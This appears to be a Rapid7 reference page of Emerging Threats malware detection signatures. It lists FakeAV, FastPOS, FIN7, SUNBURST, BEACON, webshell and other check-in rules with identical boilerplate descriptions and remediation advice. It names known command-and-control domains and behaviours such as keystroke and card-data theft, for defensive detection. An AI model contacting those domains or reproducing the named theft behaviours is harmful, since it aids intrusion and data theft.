Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAvCn-A Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAvCn-A Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV.dfze/FakeAV!IK Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake AV Downloader.Onestage/FakeAlert.ZR User-Agent (AV1)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV.EGZ Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV.EGZ Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV FakeSmoke HTTP POST check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake AV GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FAKE AV HTTP CnC Post

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV Install

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV Landing Page

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV Landing Page (aid sid)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV oms.php Data Post

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV security_scanner.exe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV User-Agent XML

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE FakeAV Win32/Antivirus2008 CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Faked Russian Opera UA without Accept - probable downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake Google Chrome Notifications Installer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake IBM SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FAKEIE Minimal Headers (flowbit set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FAKE/ROGUE AV/Security Application Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake/Short Google Search Appliance UA Win32/Ranbyus and Others

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake Software Download Redirect Leading to Malware M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake Software Download Redirect Leading to Malware M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake Software Download Redirect Leading to Malware M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake Variation of Mozilla 4.0 - Likely Trojan

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake Virtually SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake Windows Scam ScreenLocker

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FAKE YAHOO SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fareit/Pony Downloader Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fareit/Pony Downloader Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Farfli HTTP Checkin Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fasec/FakeAV Alert/Keylogger/Dropper/DNSChanger Possible Rootkit - HTTP GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS RAM Scraper Sending Details

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS Reporting Error Code

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS Sending Keystrokes

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS Sending Status Logs

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS Software Update Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS Successful Software Update Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FastPOS Version Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FBot Downloader Generic GET for ARM Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Felismus CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Felismus CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE FF-RAT Stage 1 CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FighterPOS CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE FighterPOS CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Fileless infection dropped by EK CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Filename explorer.exe Download - Common Hostile Filename

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Filename hkcmd.exe Download - Common Hostile Filename

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Filename server.exe Download - Common Hostile Filename

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Filename svchost.exe Download - Common Hostile Filename

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FIN6 StealerOne CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FIN7 JSSLoader Activity (GET)

Description
Copy link

Recommendation
Copy link

ET MALWARE FIN7 JSSLoader Activity (POST)

Description
Copy link

Recommendation
Copy link

ET MALWARE FIN7 JSSLoader Variant Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FIN7 JSSLoader Variant Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FIN7 JSSLoader Variant Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FindPOS Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.BEACON M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (databasegalore .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (incomeupdate .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (panhardware .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (zupertech .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to avsvmcloud .com

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to deftsecurity .com

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to digitalcollege .org

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to freescanonline .com

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to thedoccloud .com

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to virtualdataserver .com

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (avsvmcloud .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (deftsecurity .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (digitalcollege .org)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (freescanonline .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (highdatabase .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (thedoccloud .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (virtualdataserver .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (websitetheme .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (databasegalore .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (deftsecurity .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (freescanonline .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (highdatabase .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (incomeudpate .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (panhardware .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (thedoccloud .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (websitetheme .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (zupertech .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] PULSECHECK Webshell Access Outbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M2 (set) M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M2 (set) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FlashBack Mac OSX malware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Flashpoint] Possible CVE-2018-4878 Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FoggyWeb Backdoor Incoming Request (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FoggyWeb Backdoor Incoming Request (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Formbook 0.3 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FormBook CnC Checkin (POST) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FortDisco Reporting Status

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

